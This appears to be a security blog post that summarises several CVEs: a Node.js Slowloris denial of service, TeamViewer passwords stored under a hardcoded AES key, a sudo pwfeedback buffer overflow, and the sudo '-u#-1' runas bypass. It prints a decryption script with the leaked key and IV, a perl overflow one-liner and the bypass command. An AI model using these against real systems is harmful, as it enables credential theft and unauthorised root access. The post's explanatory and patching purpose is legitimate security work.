SherlockSec (18)

This is a Denial of Service CVE, but with a twist. Normally, denial of service attacks consist of flooding a server with enough traffic so that it ceases to operate. This CVE is different, as it is a Slowloris DoS. Slowloris DoS attacks hang a server by opening as many threads as possible before waiting the max amount of time that they can before sending data. When they finally send data, they send as small of an amount of data as the server will allow. This keeps all the threads open for as long as possible, meaning no new connections can be opened, thus causing a denial of service. For a more detailed explanation of a Slowloris attack, please see the following video: https://www.youtube.com/watch?v=XiFkyR35v2Y .

This particular CVE affects all versions of Node.JS prior to 6.15.0, 8.14.0, 10.14.0 and 11.3.0. Node patched this by applying a 40 second timeout to servers receiving HTTP headers, and can be customized. As a patch has been released, please patch accordingly.

In some versions of Teamviewer, user defined passwords are stored in the registery, encrypted with AES-128-CBC. This wouldn’t be an issue, if the key and IV for this AES encryption wasn’t stored inside the Teamviewer binary itself. This means that we now have these:

key: 0602000000a400005253413100040000 
iv:  0100010067244F436E6762F25EA8D704 

This can be used to get the stored password using either the following python script (source: https://whynotsecurity.com/blog/teamviewer/) or using the MSF Module.

import sys, hexdump, binascii
from Crypto.Cipher import AES

class AESCipher:
    def __init__(self, key):
        self.key = key

    def decrypt(self, iv, data):
        self.cipher = AES.new(self.key, AES.MODE_CBC, iv)
        return self.cipher.decrypt(data)

key = binascii.unhexlify("0602000000a400005253413100040000")
iv = binascii.unhexlify("0100010067244F436E6762F25EA8D704")
hex_str_cipher = "d690a9d0a592327f99bb4c6a6b6d4cbe"			# output from the registry

ciphertext = binascii.unhexlify(hex_str_cipher)

raw_un = AESCipher(key).decrypt(iv, ciphertext)

print(hexdump.hexdump(raw_un))

password = raw_un.decode('utf-16')
print(password)

This CVE requires users to reuse passwords across multiple accounts, so it’s not guaranteed to escalate privilleges. This is also the reason why Teamviewer themselves state the following in their Security Bulletin:

In the blog post, the researcher mentions a privilege escalation risk.
There’s no direct vulnerability offering someone the ability to gain additional privileges on the local system.
The only risk would be in the case that a user is reusing the exposed passwords on other services. 

Source – https://community.teamviewer.com/t5/Announcements/Specification-on-CVE-2019-18988/td-p/82264

This exploit is similar to CVE-2019-14287, in that it requires a specific config within /etc/sudoers. Present in sudo versions < 1.8.26, this vuln surrounds the pwfeedback option: an option that allows sudo to display asteriks when typing a sudo password. This module is susceptible to a buffer overflow attack, which was demonstrated in the following PoC:

$ perl -e 'print(("A" x 100 . "\x{00}") x 50)' | sudo -S id
    Password: Segmentation fault

Source – https://www.exploit-db.com/exploits/47995

An exploit for this vuln can be found here – https://github.com/saleemrashid/sudo-cve-2019-18634

A preconfigured test environment can be found here – https://tryhackme.com/room/sudovulnsbof

As many others before me have stated, this CVE hold very little use other than in CTF environments.

To spot this vuln, look for a configuration similar to this one in the /etc/sudoers file:

<user> ALL=(ALL:!root) NOPASSWD: ALL

If the sudo version is below 1.8.28, and the above configuration is present, you can exploit as follows:

sudo -u#-1 <command>

You can also use the unsigned equivalent of -1: 4294967295.

To test this bug in a preconfigured environment, check out https://tryhackme.com/room/sudovulnsbypass .

There’s not a lot of information about this CVE, however the notice does give us some insight. This appears to me to be a simple Man-In-The-Middle attack: one that you’d be incredibly lucky to have a use for in the wild. As such, useability for this CVE is low. If kmore information comes forward regarding this CVE, I shall update my assessment accordingly.